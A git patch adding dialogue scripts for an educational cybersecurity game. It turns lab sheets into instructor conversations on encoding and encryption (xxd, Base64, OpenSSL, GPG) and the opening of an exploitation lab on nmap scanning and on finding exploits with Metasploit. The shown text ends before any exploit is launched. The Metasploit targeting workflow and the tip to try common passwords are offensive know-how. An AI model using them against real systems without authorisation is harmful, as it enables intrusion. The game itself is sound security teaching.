From e46d8544a21befa855be9218be2c979ccd8addd8 Mon Sep 17 00:00:00 2001 From: "Z. Cliffe Schreuders" Date: Wed, 19 Nov 2025 18:24:26 +0000 Subject: [PATCH] feat: Create game scenarios directory with lab sheet copies and dead drop system - Copy all lab sheets to game_scenarios/ for narrative conversion - Add dead_drop_system.ink explaining ENTROPY's flag-based communication - Prepare for converting educational labs into game challenges --- .../ink/game_scenarios/dead_drop_system.ink | 30 + .../game_scenarios/encoding_encryption.ink | 417 +++++++ .../ink/game_scenarios/exploitation.ink | 893 +++++++++++++++ .../ink/game_scenarios/feeling_blu_ctf.ink | 598 ++++++++++ .../ink/game_scenarios/intro_linux.ink | 942 +++++++++++++++ .../ink/game_scenarios/malware_metasploit.ink | 654 +++++++++++ .../phishing_social_engineering.ink | 967 ++++++++++++++++ .../ink/game_scenarios/post_exploitation.ink | 906 +++++++++++++++ story_design/ink/game_scenarios/scanning.ink | 1008 +++++++++++++++++ .../vulnerabilities_exploits.ink | 750 ++++++++++++ .../game_scenarios/vulnerability_analysis.ink | 562 +++++++++ 11 files changed, 7727 insertions(+) create mode 100644 story_design/ink/game_scenarios/dead_drop_system.ink create mode 100644 story_design/ink/game_scenarios/encoding_encryption.ink create mode 100644 story_design/ink/game_scenarios/exploitation.ink create mode 100644 story_design/ink/game_scenarios/feeling_blu_ctf.ink create mode 100644 story_design/ink/game_scenarios/intro_linux.ink create mode 100644 story_design/ink/game_scenarios/malware_metasploit.ink create mode 100644 story_design/ink/game_scenarios/phishing_social_engineering.ink create mode 100644 story_design/ink/game_scenarios/post_exploitation.ink create mode 100644 story_design/ink/game_scenarios/scanning.ink create mode 100644 story_design/ink/game_scenarios/vulnerabilities_exploits.ink create mode 100644 story_design/ink/game_scenarios/vulnerability_analysis.ink 
diff --git a/story_design/ink/game_scenarios/dead_drop_system.ink b/story_design/ink/game_scenarios/dead_drop_system.ink new file mode 100644 index 0000000..19a2cba --- /dev/null +++ b/story_design/ink/game_scenarios/dead_drop_system.ink @@ -0,0 +1,30 @@ +// ENTROPY Dead Drop Communication System +// Reusable explanation for game scenarios + +=== haxolottle_explains_dead_drops === +Haxolottle: Let me tell you about ENTROPY's communication method, little axolotl. + +Haxolottle: They don't use email or phones - too easy to intercept. Instead, they use "dead drops." + +Haxolottle: They hide encoded messages in compromised systems as flag strings. + +Haxolottle: When you see flag{distcc_backdoor_active}, that's not just a trophy. It's a signal. + +Haxolottle: It tells the next operative: "This system is compromised and ready for the next phase." + ++ [So flags are coordination signals?] + Haxolottle: Exactly! And here's the beautiful part - they're hiding in plain sight. + Haxolottle: To most people, flag{...} looks like a CTF artifact, test data, developer placeholder. + Haxolottle: But to ENTROPY, it's operational communication. + -> explain_extraction + += explain_extraction +Haxolottle: Your job is to intercept these dead drops before the next ENTROPY operative finds them. + +Haxolottle: Extract the flag, and their coordination breaks down. + +Haxolottle: Plus, we can analyze the message format to understand their operational timeline. + ++ [I'll intercept every message.] + Haxolottle: That's the spirit! Break their communication chain. + -> DONE diff --git a/story_design/ink/game_scenarios/encoding_encryption.ink b/story_design/ink/game_scenarios/encoding_encryption.ink new file mode 100644 index 0000000..2e8fb95 --- /dev/null +++ b/story_design/ink/game_scenarios/encoding_encryption.ink 
@@ -0,0 +1,417 @@ +// =========================================== +// CRYPTOGRAPHY LAB: ENCODING AND ENCRYPTION +// Introduction to Cryptography +// =========================================== +// Game-Based Learning replacement for lab sheet +// Original: cyber_security_landscape/4_encoding_encryption.md +// =========================================== + +// Global persistent state +VAR instructor_rapport = 0 + +// External variables +EXTERNAL player_name + +// =========================================== +// ENTRY POINT +// =========================================== + +=== start === +Crypto Instructor: Welcome to Cryptography Fundamentals, Agent {player_name}. + +Crypto Instructor: Today we're covering encoding and encryption - two concepts that sound similar but serve very different purposes. + +Crypto Instructor: You'll learn about encoding schemes like Base64 and hexadecimal, symmetric encryption with AES and DES, and asymmetric cryptography with GPG. + +Crypto Instructor: These skills are essential for any security professional. Let's begin. + +-> crypto_hub + +// =========================================== +// MAIN HUB +// =========================================== + +=== crypto_hub === +Crypto Instructor: What would you like to explore? + ++ [Encoding vs Encryption - what's the difference?] 
+ -> encoding_vs_encryption ++ [Character encoding and ASCII] + -> character_encoding ++ [Hexadecimal and Base64] + -> hex_and_base64 ++ [Symmetric key encryption] + -> symmetric_encryption ++ [Public key cryptography] + -> public_key_crypto ++ [OpenSSL tools and commands] + -> openssl_tools ++ [GPG key management] + -> gpg_intro ++ [Show me the commands reference] + -> commands_reference ++ [I'm ready for the practical challenges] + -> ready_for_practice ++ [That's all for now] + #exit_conversation + -> END + +// =========================================== +// ENCODING VS ENCRYPTION +// =========================================== + +=== encoding_vs_encryption === +~ instructor_rapport += 5 + +Crypto Instructor: Excellent starting point. These terms get confused constantly. + +Crypto Instructor: **Encoding** transforms data into a different format using a publicly known, reversible scheme. Anyone can decode it - no secret required. + +Crypto Instructor: **Encryption** transforms data into a format readable only with a key or password. Without the key, the data is protected. + +Crypto Instructor: Think of it this way: encoding is like translating a book to a different language. Anyone with the right dictionary can read it. Encryption is like using a secret cipher - only those with the key can decode it. + +* [Why use encoding if it's not secure?] + ~ instructor_rapport += 8 + You: If encoding doesn't provide security, why use it? + Crypto Instructor: Compatibility and efficiency. Base64, for instance, lets you safely transmit binary data over text-only protocols like email. Hexadecimal makes binary data human-readable for debugging. + Crypto Instructor: Encoding solves technical problems. Encryption solves security problems. Different tools for different jobs. +* [Can you give examples of each?] + You: What are common examples of encoding and encryption? + Crypto Instructor: Encoding: Base64, hexadecimal, ASCII, URL encoding. Used for data representation. 
+ Crypto Instructor: Encryption: AES, RSA, DES. Used for data protection. + Crypto Instructor: If you find Base64 data, don't assume it's encrypted - it's just encoded. Trivial to reverse. +* [Got it] + You: Clear distinction. +- -> crypto_hub + +// =========================================== +// CHARACTER ENCODING +// =========================================== + +=== character_encoding === +~ instructor_rapport += 5 + +Crypto Instructor: Let's start with the basics - how computers represent text. + +Crypto Instructor: ASCII - American Standard Code for Information Interchange. Maps characters to numbers. For example, "hello!" is: +- Decimal: 104 101 108 108 111 33 +- Hex: 68 65 6c 6c 6f 21 +- Binary: 01101000 01100101 01101100 01101100 01101111 00100001 + +Crypto Instructor: All the same data, just different representations. + +* [Why multiple representations?] + ~ instructor_rapport += 8 + You: Why do we need so many ways to represent the same thing? + Crypto Instructor: Context. Humans read decimal. Computers process binary. Hex is compact for humans to read binary - two hex digits per byte. + Crypto Instructor: Choose the representation that fits your needs. Debugging network traffic? Hex. Mathematical operations? Decimal. Actual processing? Binary. +* [Tell me about Unicode] + You: How does Unicode fit in? + Crypto Instructor: ASCII is 7-bit, covers English characters. Unicode extends this to support every language, emoji, symbols. + Crypto Instructor: UTF-8 is the dominant Unicode encoding - backward-compatible with ASCII, supports international characters efficiently. + Crypto Instructor: Most modern systems use UTF-8 by default. +* [Show me practical commands] + You: What commands convert between these formats? + Crypto Instructor: `xxd` is your friend. Try: + - `echo hello! | xxd` for hex output + - `echo hello! 
| xxd -b` for binary + - `echo 68656c6c6f21 | xxd -r -p` to convert hex back to text + Crypto Instructor: Python's also excellent: `"hello!".encode().hex()` gets you hex. +- -> crypto_hub + +// =========================================== +// HEX AND BASE64 +// =========================================== + +=== hex_and_base64 === +~ instructor_rapport += 5 + +Crypto Instructor: Two encoding schemes you'll encounter constantly: hexadecimal and Base64. + +Crypto Instructor: **Hexadecimal**: Base-16. Uses 0-9 and a-f. Two hex characters per byte. Compact, human-readable representation of binary data. + +Crypto Instructor: **Base64**: Uses A-Z, a-z, 0-9, +, /, and = for padding. More efficient than hex for transmitting binary data. Four characters represent three bytes. + +* [When do I use Base64 vs hex?] + ~ instructor_rapport += 10 + You: How do I choose between Base64 and hex? + Crypto Instructor: Base64 when efficiency matters - 33% overhead vs 100% for hex. Common in web protocols, email attachments, JSON/XML with binary data. + Crypto Instructor: Hex when human readability and debugging matter. Easier to spot patterns, map directly to bytes. + Crypto Instructor: In CTFs and forensics? You'll see both constantly. Learn to recognize them on sight. +* [Show me Base64 commands] + You: Walk me through Base64 encoding. + Crypto Instructor: Simple: `echo "text" | base64` encodes. `echo "encoded" | base64 -d` decodes. + Crypto Instructor: Try this chain: `echo "Valhalla" | base64 | xxd -p | xxd -r -p | base64 -d` + Crypto Instructor: You're encoding to Base64, converting to hex, converting back, decoding Base64. Should get "Valhalla" back. Demonstrates reversibility. +* [How do I recognize Base64?] + You: How can I identify Base64 when I see it? + Crypto Instructor: Look for: alphanumeric characters, sometimes with + and /, often ending in = or ==. + Crypto Instructor: Length is always multiple of 4 (due to padding). 
+ Crypto Instructor: Classic tell: mix of uppercase, lowercase, and numbers, ending in equals signs. + Crypto Instructor: Example: `VmFsaGFsbGEK` - that's Base64. +- -> crypto_hub + +// =========================================== +// SYMMETRIC ENCRYPTION +// =========================================== + +=== symmetric_encryption === +~ instructor_rapport += 5 + +Crypto Instructor: Symmetric encryption - the same key encrypts and decrypts. Fast, efficient, but has a key distribution problem. + +Crypto Instructor: Two main algorithms you'll use: DES and AES. + +* [Tell me about DES] + You: What's DES? + -> des_explanation +* [Tell me about AES] + You: What's AES? + -> aes_explanation +* [What's the key distribution problem?] + ~ instructor_rapport += 10 + You: You mentioned a key distribution problem? + Crypto Instructor: The fundamental challenge of symmetric crypto: how do you securely share the key? + Crypto Instructor: If you encrypt a message with AES, your recipient needs the same key to decrypt. How do you get them the key without an attacker intercepting it? + Crypto Instructor: This is where public key crypto comes in - or secure key exchange protocols like Diffie-Hellman. + -> symmetric_encryption +* [Back to main menu] + -> crypto_hub + +=== des_explanation === +~ instructor_rapport += 5 + +Crypto Instructor: DES - Data Encryption Standard. Developed by IBM in the 1970s, based on Feistel ciphers. + +Crypto Instructor: 56-bit key size. Small by modern standards - brute-forceable in reasonable time with modern hardware. + +Crypto Instructor: Historical importance, but don't use it for real security anymore. Superseded by AES. + +Crypto Instructor: OpenSSL command: `openssl enc -des-cbc -pbkdf2 -in file.txt -out file.enc` + +* [Why is 56-bit insufficient?] + ~ instructor_rapport += 8 + You: Why is 56 bits too small? + Crypto Instructor: 2^56 possible keys - about 72 quadrillion. 
Sounds large, but modern systems can test millions or billions of keys per second. + Crypto Instructor: DES was cracked in less than 24 hours in 1999. Hardware has only improved since then. + Crypto Instructor: Compare to AES-256: 2^256 keys. Astronomically larger. Not brute-forceable with current or foreseeable technology. +* [Show me the decryption command] + You: How do I decrypt DES-encrypted data? + Crypto Instructor: `openssl enc -des-cbc -d -in file.enc -out decrypted.txt` + Crypto Instructor: The `-d` flag specifies decryption. You'll be prompted for the password. + Crypto Instructor: Note: password and key aren't quite the same. The password is hashed with PBKDF2 to derive the actual encryption key. +- -> symmetric_encryption + +=== aes_explanation === +~ instructor_rapport += 5 + +Crypto Instructor: AES - Advanced Encryption Standard. The modern symmetric encryption standard. + +Crypto Instructor: 128-bit block cipher. Key sizes: 128, 192, or 256 bits. Uses substitution-permutation network - combination of substitution, permutation, mixing, and key addition. + +Crypto Instructor: Fast, secure, widely supported. This is what you should be using for symmetric encryption. + +* [How much stronger is AES than DES?] + ~ instructor_rapport += 10 + You: Quantify the security improvement over DES. + Crypto Instructor: DES: 2^56 keyspace. AES-128: 2^128. AES-256: 2^256. + Crypto Instructor: AES-128 has 2^72 times more keys than DES. AES-256 has 2^200 times more keys than AES-128. + Crypto Instructor: To put it in perspective: if you could test a trillion trillion keys per second, AES-256 would still take longer than the age of the universe to brute force. + Crypto Instructor: Practical attacks on AES focus on implementation flaws, side channels, or compromising the key - not brute forcing. +* [Show me AES commands] + You: Walk me through AES encryption. 
+ Crypto Instructor: Encrypt: `openssl enc -aes-256-cbc -pbkdf2 -in file.txt -out file.enc` + Crypto Instructor: Decrypt: `openssl enc -aes-256-cbc -d -in file.enc -out file.txt` + Crypto Instructor: You can use -aes-128-cbc, -aes-192-cbc, or -aes-256-cbc depending on key size. + Crypto Instructor: CBC mode is Cipher Block Chaining. ECB mode also available but has security weaknesses - avoid for real use. +* [What's CBC mode?] + ~ instructor_rapport += 8 + You: Explain CBC mode. + Crypto Instructor: Cipher Block Chaining. Each block of plaintext is XORed with the previous ciphertext block before encryption. + Crypto Instructor: This means identical plaintext blocks produce different ciphertext - hides patterns. + Crypto Instructor: ECB (Electronic Codebook) encrypts each block independently - same input always produces same output. Leaks pattern information. + Crypto Instructor: Always use CBC or more modern modes like GCM. Never use ECB for real data. +- -> symmetric_encryption + +// =========================================== +// PUBLIC KEY CRYPTOGRAPHY +// =========================================== + +=== public_key_crypto === +~ instructor_rapport += 5 + +Crypto Instructor: Asymmetric cryptography. Revolutionary concept - separate keys for encryption and decryption. + +Crypto Instructor: **Public key**: shared freely. Anyone can use it to encrypt messages to you. +**Private key**: kept secret. Only you can decrypt messages encrypted with your public key. + +Crypto Instructor: Solves the key distribution problem. You can publish your public key openly - doesn't compromise security. + +* [How does this actually work?] + ~ instructor_rapport += 10 + You: What's the underlying mechanism? + Crypto Instructor: Mathematics - specifically, functions that are easy to compute in one direction but extremely hard to reverse without special information. + Crypto Instructor: RSA uses factoring large prime numbers. 
Easy to multiply two huge primes, nearly impossible to factor the result back without knowing the primes. + Crypto Instructor: Your private key contains the primes. Your public key contains their product. Encryption uses the product, decryption needs the primes. + Crypto Instructor: Full math is beyond this course, but that's the essence. One-way mathematical trap doors. +* [What's the downside?] + ~ instructor_rapport += 8 + You: This sounds perfect. What's the catch? + Crypto Instructor: Performance. Asymmetric crypto is much slower than symmetric. + Crypto Instructor: Typical use: asymmetric crypto to exchange a symmetric key, then symmetric crypto for actual data. + Crypto Instructor: TLS/SSL does exactly this - RSA or ECDH to agree on a session key, then AES to encrypt the connection. + Crypto Instructor: Hybrid approach gets security of asymmetric with performance of symmetric. +* [Tell me about GPG] + You: How does GPG fit into this? + Crypto Instructor: GPG - GNU Privacy Guard. Open source implementation of PGP (Pretty Good Privacy). + Crypto Instructor: Provides public-key crypto for email encryption, file encryption, digital signatures. + Crypto Instructor: Industry standard for email security and file protection. + -> gpg_intro +- -> crypto_hub + +// =========================================== +// OPENSSL TOOLS +// =========================================== + +=== openssl_tools === +~ instructor_rapport += 5 + +Crypto Instructor: OpenSSL - the Swiss Army knife of cryptography. + +Crypto Instructor: It's a toolkit implementing SSL/TLS protocols and providing cryptographic functions. Command-line tool plus libraries. + +Crypto Instructor: Can do: key generation, encryption, decryption, hashing, certificate management, SSL/TLS testing, and much more. + +* [Show me useful commands] + You: What are the most useful OpenSSL commands? 
+ Crypto Instructor: List available ciphers: `openssl list -cipher-algorithms` + Crypto Instructor: Generate hash: `echo "data" | openssl dgst -sha256` + Crypto Instructor: Encrypt file: `openssl enc -aes-256-cbc -in file -out file.enc` + Crypto Instructor: Check certificate: `openssl x509 -in cert.pem -text -noout` + Crypto Instructor: Test SSL connection: `openssl s_client -connect example.com:443` + Crypto Instructor: Generate random bytes: `openssl rand -hex 32` +* [Tell me about the 2014 vulnerability] + ~ instructor_rapport += 15 + You: You mentioned a major OpenSSL vulnerability in 2014? + Crypto Instructor: Heartbleed. CVE-2014-0160. One of the most significant security flaws in internet history. + Crypto Instructor: Bug in OpenSSL's implementation of TLS heartbeat extension. Allowed attackers to read server memory - including private keys, passwords, session tokens. + Crypto Instructor: Affected two-thirds of web servers. Required widespread patching and certificate replacement. + Crypto Instructor: Important lesson: even cryptographic implementations can have bugs. The algorithms (AES, RSA) were fine - the implementation was flawed. + Crypto Instructor: This is why: keep software updated, use well-audited libraries, implement defense in depth. +* [How do I check OpenSSL version?] + You: How do I know what version I'm running? + Crypto Instructor: `openssl version -a` shows version and build details. + Crypto Instructor: Post-Heartbleed, you want OpenSSL 1.0.1g or later, or 1.0.2 series. + Crypto Instructor: Most modern systems use OpenSSL 1.1.1 or 3.x now. +- -> crypto_hub + +// =========================================== +// GPG INTRODUCTION +// =========================================== + +=== gpg_intro === +~ instructor_rapport += 5 + +Crypto Instructor: GPG - GNU Privacy Guard. Open-source public-key cryptography and signing tool. + +Crypto Instructor: Core concepts: key pairs (public and private), encryption, decryption, signing, verification. 
+ +* [Walk me through key generation] + You: How do I create GPG keys? + Crypto Instructor: `gpg --gen-key` starts the process. You'll provide name, email, passphrase. + Crypto Instructor: This creates a key pair. Public key you share, private key you protect. + Crypto Instructor: The passphrase protects your private key - don't forget it! Without it, your private key is useless. +* [How do I share my public key?] + You: How do others get my public key? + Crypto Instructor: Export it: `gpg --export -a "Your Name" > public.key` + Crypto Instructor: This creates ASCII-armored public key file. Share it via email, website, key server. + Crypto Instructor: Recipients import it: `gpg --import public.key` + Crypto Instructor: Now they can encrypt messages only you can read. +* [Encrypting and decrypting] + You: Show me the encryption workflow. + Crypto Instructor: Encrypt: `gpg -e -r "Recipient Name" file.txt` creates file.txt.gpg + Crypto Instructor: Decrypt: `gpg -d file.txt.gpg > decrypted.txt` + Crypto Instructor: Recipient's public key must be in your keyring to encrypt for them. + Crypto Instructor: Your private key must be available to decrypt messages to you. +* [What about digital signatures?] + ~ instructor_rapport += 10 + You: How do signatures work? + Crypto Instructor: Signatures prove a message came from you and wasn't modified. + Crypto Instructor: Sign: `gpg -s file.txt` - creates file.txt.gpg with signature + Crypto Instructor: Verify: `gpg --verify file.txt.gpg` - confirms signature and shows signer + Crypto Instructor: Uses your private key to sign, others use your public key to verify. Reverse of encryption. + Crypto Instructor: Provides authenticity and integrity - critical for software distribution, secure communications. 
+- -> crypto_hub + +// =========================================== +// COMMANDS REFERENCE +// =========================================== + +=== commands_reference === +Crypto Instructor: Quick reference for the commands we've covered: + +Crypto Instructor: **Encoding:** +- Hex: `echo "text" | xxd -p` (encode), `echo "hex" | xxd -r -p` (decode) +- Base64: `echo "text" | base64` (encode), `echo "b64" | base64 -d` (decode) +- View as binary: `xxd -b file` + +Crypto Instructor: **Symmetric Encryption (OpenSSL):** +- AES encrypt: `openssl enc -aes-256-cbc -pbkdf2 -in file -out file.enc` +- AES decrypt: `openssl enc -aes-256-cbc -d -in file.enc -out file.txt` +- DES encrypt: `openssl enc -des-cbc -pbkdf2 -in file -out file.enc` +- List ciphers: `openssl list -cipher-algorithms` + +Crypto Instructor: **Public Key Crypto (GPG):** +- Generate keys: `gpg --gen-key` +- List keys: `gpg --list-keys` +- Export public: `gpg --export -a "Name" > public.key` +- Import key: `gpg --import key.asc` +- Encrypt: `gpg -e -r "Recipient" file` +- Decrypt: `gpg -d file.gpg` +- Sign: `gpg -s file` +- Verify: `gpg --verify file.gpg` + +Crypto Instructor: **Useful OpenSSL:** +- Hash: `openssl dgst -sha256 file` +- Random data: `openssl rand -hex 32` +- Version: `openssl version` + ++ [Back to main menu] + -> crypto_hub + +// =========================================== +// READY FOR PRACTICE +// =========================================== + +=== ready_for_practice === +Crypto Instructor: Excellent. You've covered the fundamentals. + +Crypto Instructor: In your VM's home directory, you'll find CTF challenges testing these skills: +- Decoding various encoded data +- Decrypting symmetrically-encrypted files +- Using GPG for secure communication +- Breaking weak encryption + +Crypto Instructor: Practical tips: + +Crypto Instructor: **Recognize encoding schemes on sight**: Base64 ends in =, hex is 0-9 and a-f, binary is only 0 and 1. 
+ +Crypto Instructor: **Try obvious passwords first**: "password", "admin", "123456". Weak keys are common. + +Crypto Instructor: **Check file headers**: `file` command identifies file types even if extension is wrong. Encoded/encrypted data looks like random bytes. + +Crypto Instructor: **Use CyberChef for quick analysis**: Web tool that chains encoding/decoding operations. Great for CTFs. + +Crypto Instructor: **Document what you try**: When attempting decryption, track what keys/methods you've tested. Easy to lose track. + +{instructor_rapport >= 50: + Crypto Instructor: You've asked excellent questions and engaged deeply with the material. You're well-prepared. +} + +Crypto Instructor: Remember: encoding is reversible with no secret. Encryption requires keys. Symmetric uses same key for both. Asymmetric uses key pairs. + +Crypto Instructor: Now go break some crypto challenges. Good luck, Agent {player_name}. + +#exit_conversation +-> END diff --git a/story_design/ink/game_scenarios/exploitation.ink b/story_design/ink/game_scenarios/exploitation.ink new file mode 100644 index 0000000..cf5056a --- /dev/null +++ b/story_design/ink/game_scenarios/exploitation.ink 
@@ -0,0 +1,893 @@ +// From Scanning to Exploitation Lab Sheet +// Based on HacktivityLabSheets: introducing_attacks/6_exploitation.md +// Author: Z. Cliffe Schreuders, Anatoliy Gorbenko, Tom Shaw, Thalita Vergilio +// License: CC BY-SA 4.0 + +// Global persistent state +VAR instructor_rapport = 0 +VAR exploitation_mastery = 0 + +// External variables +EXTERNAL player_name + +=== start === +Exploitation Specialist: Welcome back, Agent {player_name}. I'm your instructor for Advanced Exploitation Techniques. + +~ instructor_rapport = 0 +~ exploitation_mastery = 0 + +Exploitation Specialist: This lab brings together everything you've learned so far - scanning, vulnerability research, and exploitation. + +Exploitation Specialist: You'll learn how to move from network scanning to identifying vulnerabilities, searching for exploits, and ultimately gaining control of target systems. + +Exploitation Specialist: We'll use both Metasploit console and Armitage, a graphical interface that can automate parts of the hacking process. + +Exploitation Specialist: Remember: this knowledge is for authorized penetration testing and defensive security only. + +~ exploitation_mastery += 10 + +-> exploitation_hub + +=== exploitation_hub === +Exploitation Specialist: What aspect of exploitation would you like to explore? + ++ [Why combine scanning and exploitation?] 
+ -> scanning_to_exploitation ++ [Scanning targets with Nmap] + -> nmap_scanning ++ [Metasploit database and scan import] + -> metasploit_database ++ [Running scans from within msfconsole] + -> msfconsole_scanning ++ [Searching for Metasploit exploits] + -> searching_exploits ++ [Launching Metasploit exploits] + -> launching_exploits ++ [Introduction to Armitage] + -> armitage_intro ++ [Using Armitage for automated hacking] + -> armitage_usage ++ [Vulnerability databases and research] + -> vulnerability_databases ++ [The Exploit Database and searchsploit] + -> exploit_db ++ [Show me the commands reference] + -> commands_reference ++ [Practical challenge tips] + -> challenge_tips ++ [I'm ready for the lab exercises] + -> ready_for_practice ++ [That's all for now] + #exit_conversation + -> END + +=== scanning_to_exploitation === +Exploitation Specialist: After gathering information about a target through footprinting and scanning, you need to know what attacks will work. + +~ instructor_rapport += 5 + +Exploitation Specialist: The key questions are: Where will you find vulnerability information? How will you use that information to launch an attack? How can security professionals use this to test system security? + +Exploitation Specialist: Once you know the operating system and software running on a system, you can refer to your own knowledge of known vulnerabilities, or search online databases for more extensive information. + ++ [What makes a target exploitable?] + Exploitation Specialist: A target is exploitable when it's running vulnerable software that you have an exploit for. + + Exploitation Specialist: For example, if a target is running an old version of Windows with known vulnerabilities, there are numerous exploits that could give you full control of the system. + + Exploitation Specialist: The scanning phase reveals what's running. The vulnerability research phase identifies what's vulnerable. The exploitation phase is when you actually attack. 
+ + ~ instructor_rapport += 5 + ++ [How do I know what attacks will work?] + Exploitation Specialist: This is where vulnerability databases and exploit frameworks like Metasploit come in. + + Exploitation Specialist: After scanning reveals "Windows 2000 with EasyFTP 1.7.0.11," you can search for known vulnerabilities in those specific versions. + + Exploitation Specialist: Metasploit has over a thousand exploits built in. You can search them by platform, service name, or CVE number. + + Exploitation Specialist: We'll also look at external databases like CVE Details, NVD, and Exploit DB. + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== nmap_scanning === +Exploitation Specialist: The first step is thorough scanning to identify your targets and what they're running. + +~ instructor_rapport += 5 + +Exploitation Specialist: For this lab, you'll scan your network to find two vulnerable servers - one Linux and one Windows. + +Exploitation Specialist: A comprehensive scan would be: nmap -sV 10.X.X.2-3 + +Exploitation Specialist: Where X.X are the second and third octets of your Kali VM's IP address. + ++ [What should I look for in the scan results?] + Exploitation Specialist: Pay attention to several key pieces of information: + + Exploitation Specialist: First, the IP addresses - which host is Linux and which is Windows? + + Exploitation Specialist: Second, what services are running - HTTP, FTP, SSH, IRC? + + Exploitation Specialist: Third, and most importantly, what specific software versions are running. For example: "vsftpd 2.3.4" or "EasyFTP 1.7.0.11" + + Exploitation Specialist: Those specific version numbers are critical for finding applicable exploits. + + ~ instructor_rapport += 5 + ++ [What if the scan takes too long?] + Exploitation Specialist: Windows scans can take several minutes to complete - this is normal. + + Exploitation Specialist: If you want faster results, you can skip OS detection or scan fewer ports. 
+ + Exploitation Specialist: However, for thorough penetration testing, patience is important. You don't want to miss a vulnerable service on an unusual port. + + ~ instructor_rapport += 5 + ++ [What if nmap shows ftp with a question mark?] + Exploitation Specialist: If you see "ftp?" in the results, it means Nmap isn't confident about the service identification. + + Exploitation Specialist: This can happen if the service is slow to respond or behaving unusually. + + Exploitation Specialist: Try restarting the Windows server and scanning again. The service should respond properly after a fresh start. + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== metasploit_database === +Exploitation Specialist: Metasploit includes a PostgreSQL database that stores information about hosts, services, and vulnerabilities. + +~ instructor_rapport += 5 + +Exploitation Specialist: This database integration is extremely powerful - it lets you import scan results and automatically target vulnerable services. + +Exploitation Specialist: Before using the database, you need to initialize it and start PostgreSQL. + ++ [How do I initialize the Metasploit database?] + Exploitation Specialist: First, reinitialize the database: sudo msfdb reinit + + Exploitation Specialist: Then start PostgreSQL: sudo service postgresql start + + Exploitation Specialist: These commands set up the database that Metasploit will use to store scan results and track compromised hosts. + + Exploitation Specialist: You only need to do this once per session, or after restarting your Kali VM. + + ~ instructor_rapport += 5 + ++ [How do I import Nmap scan results?] + Exploitation Specialist: If you've saved Nmap results in XML format, you can import them: + + Exploitation Specialist: From msfconsole, run: db_import scan_output.xml + + Exploitation Specialist: Metasploit will parse the XML and populate the database with host and service information. 
+ + Exploitation Specialist: You can then query this data with commands like "hosts" and "services" + + ~ instructor_rapport += 5 + ++ [What can I do with the database?] + Exploitation Specialist: Once data is in the database, you can query it intelligently: + + Exploitation Specialist: "hosts" shows all discovered hosts and their operating systems. + + Exploitation Specialist: "services" shows all discovered services across all hosts. + + Exploitation Specialist: "services -p 21" shows only services on port 21 (FTP). + + Exploitation Specialist: "services -p 21 -R" does the same AND automatically sets RHOSTS to target those services! + + Exploitation Specialist: This integration makes targeting much more efficient. + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== msfconsole_scanning === +Exploitation Specialist: You can run scans directly from within msfconsole - you don't always need a separate terminal. + +~ instructor_rapport += 5 + +Exploitation Specialist: Msfconsole can run Bash commands, so you can run Nmap directly: msf > nmap -O -sV TARGET + +Exploitation Specialist: Even better, you can use db_nmap which scans AND automatically imports results into the database. + ++ [What's the difference between nmap and db_nmap?] + Exploitation Specialist: When you run "nmap" from msfconsole, it just executes Nmap normally. You'd need to manually import the results. + + Exploitation Specialist: When you run "db_nmap", it does the same scan BUT automatically imports results into the Metasploit database. + + Exploitation Specialist: For example: msf > db_nmap -O -sV -p 1-65535 TARGET + + Exploitation Specialist: This scans all ports with OS and version detection, and the results are immediately available via "hosts" and "services" + + ~ instructor_rapport += 5 + ++ [Does Metasploit have its own scanners?] + Exploitation Specialist: Yes! Metasploit has various port scanning modules, though they're not as feature-complete as Nmap. 
+ + Exploitation Specialist: You can see them with: use auxiliary/scanner/portscan/ (then press TAB) + + Exploitation Specialist: For a basic TCP connect scan: use auxiliary/scanner/portscan/tcp + + Exploitation Specialist: These modules integrate directly with the database and can use multiple threads for faster scanning. + + ~ instructor_rapport += 5 + ++ [How do I use Metasploit's port scanner?] + Exploitation Specialist: First, select the module: use auxiliary/scanner/portscan/tcp + + Exploitation Specialist: Set the target: set RHOSTS TARGET_IP + + Exploitation Specialist: Optionally speed it up: set THREADS 10 + + Exploitation Specialist: Then run it: run + + Exploitation Specialist: Results are automatically stored in the database. You can verify with the "services" command. + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== searching_exploits === +Exploitation Specialist: Metasploit's search command is incredibly powerful for finding relevant exploits. + +~ instructor_rapport += 5 + +Exploitation Specialist: You can search by platform, service name, CVE number, exploit type, and more. + +Exploitation Specialist: The basic syntax is: search + +Exploitation Specialist: But you can be much more specific with search operators. + ++ [What search operators are available?] + Exploitation Specialist: Here are the main search operators: + + Exploitation Specialist: type: - Specify module type (exploit, auxiliary, post) + + Exploitation Specialist: platform: - Specify platform (Windows, Linux, etc.) + + Exploitation Specialist: cve: - Search by CVE number + + Exploitation Specialist: name: - Search module names + + Exploitation Specialist: For example: search type:exploit platform:Windows + + Exploitation Specialist: Or: search type:exploit cve:2003-0352 + + ~ instructor_rapport += 5 + ++ [How do I search for specific software?] 
+ Exploitation Specialist: Simply include the software name in the search: + + Exploitation Specialist: search easyftp + + Exploitation Specialist: search vsftpd + + Exploitation Specialist: search unreal + + Exploitation Specialist: Metasploit will search module names, descriptions, and references for matches. + + Exploitation Specialist: Look through the results for modules that match your target's version number. + + ~ instructor_rapport += 5 + ++ [Give me some search examples] + Exploitation Specialist: Sure! Here are useful searches: + + Exploitation Specialist: search type:exploit platform:linux + + Exploitation Specialist: search type:exploit cve:2018 + + Exploitation Specialist: search buffer overflow + + Exploitation Specialist: search type:exploit platform:Windows XP + + Exploitation Specialist: search IRC (to find IRC server exploits) + + Exploitation Specialist: Once you find a promising module, use "info exploit/path/to/module" to learn more about it. + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== launching_exploits === +Exploitation Specialist: Once you've identified the right exploit module, launching it follows a standard workflow. + +~ instructor_rapport += 5 + +Exploitation Specialist: The process is: select the module, configure options, choose a payload, and launch the attack. + +Exploitation Specialist: Let's walk through a typical exploitation scenario. 
